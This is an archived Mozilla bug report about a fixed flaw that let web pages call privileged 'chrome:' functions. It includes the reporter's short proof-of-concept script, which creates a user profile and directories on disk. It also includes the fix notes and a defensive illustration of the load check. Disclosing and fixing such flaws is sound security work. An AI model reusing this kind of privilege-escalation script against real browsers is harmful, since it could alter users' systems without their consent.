Executing functions in "chrome:" protocol - #2.

VERIFIED FIXED in M13

Status: VERIFIED FIXED
Product: Core
Component: Security
Priority: P3
Severity: normal
Reported: 19 years ago
Modified: 19 years ago

Reporter: joro
Assigned: Norris Boyd

Version: Trunk
Hardware: x86
OS: Windows 95

Description (Reporter, 19 years ago)

There is another chrome vulnerability, which allows executing JavaScript
functions in the "chrome:" protocol.
This is dangerous because such functions have much more privileges than
JavaScript functions loaded from a web page.
If one opens a "chrome:" URL in a window, he has access to all functions in the
window, and the functions are executed by "windowname.functionname()" in the
"chrome:" protocol.
Some of the predefined functions in the Mozilla chrome may do dangerous things.

The code is:
----------------------------------------------------------------------
<SCRIPT>
// Open an empty window named "victim"; the link below loads a chrome: URL into it.
b=window.open("","victim");
function g()
{
// Once the chrome document is in the named window, its functions are callable from here.
b.profile.createNewProfile("georgi","c:\\georgi\\");
alert("Profile created! You'd better close this window because directories are created");
}
setInterval("g()",4000);
</SCRIPT>

<A HREF="chrome://profile/content/createProfileWizard.xul"
TARGET="victim">Follow this link for demonstration</A>
----------------------------------------------------------------------
Updated (Assignee, 19 years ago)

Status: NEW → ASSIGNED
Target Milestone: M13

Updated (Assignee, 19 years ago)

Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Comment 1 (Assignee, 19 years ago)

Added call to CheckLoadURI from TriggerLink.
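The fix in Comment 1 checks the link target before following it. As an added illustration (not Mozilla's code; `checkLoadURI`, `triggerLink` and the sample URLs are hypothetical), here is a minimal model of that policy: a document whose own scheme is unprivileged may not load a "chrome:" URL, so the report's link into the named window is refused before the chrome document ever reaches it.

```javascript
// Added illustration, not Mozilla's code: a minimal model of the policy the fix
// describes (a CheckLoadURI-style check run before a link is followed).
// Function and variable names here are hypothetical.

// Schemes that expose privileged functions and must never be reachable
// from ordinary web content. The report only concerns "chrome:".
const PRIVILEGED_SCHEMES = new Set(["chrome"]);

// Extract the scheme of an absolute URL, normalised to lower case;
// returns null for relative or malformed input.
function schemeOf(url) {
  const m = /^\s*([a-z][a-z0-9+.-]*):/i.exec(String(url));
  return m ? m[1].toLowerCase() : null;
}

// Decide whether a document loaded from `sourceUrl` may load `targetUrl`.
// Unprivileged sources may load only unprivileged targets; privileged
// sources may load anything.
function checkLoadURI(sourceUrl, targetUrl) {
  const src = schemeOf(sourceUrl);
  const dst = schemeOf(targetUrl);
  if (dst === null) return false;                 // unresolved target: deny (assumption)
  if (!PRIVILEGED_SCHEMES.has(dst)) return true;  // ordinary web target
  return src !== null && PRIVILEGED_SCHEMES.has(src);
}

// Model of a link handler: the check runs before the navigation is issued,
// so a web page's <A HREF="chrome://..." TARGET="victim"> is refused and the
// named window never receives a chrome: document.
function triggerLink(sourceUrl, href, target) {
  if (!checkLoadURI(sourceUrl, href)) {
    return { loaded: false, target, reason: "CheckLoadURI denied " + href };
  }
  return { loaded: true, target, url: href };
}

// Constructed sample: an ordinary http page carrying the link from the report.
const webPage = "http://web.example/poc.html";
const chromeLink = "chrome://profile/content/createProfileWizard.xul";
const result = triggerLink(webPage, chromeLink, "victim");
// result.loaded === false
```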

Comment 2 (19 years ago)

Verified fixed.
Status: RESOLVED → VERIFIED

Comment 3 (19 years ago)

Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General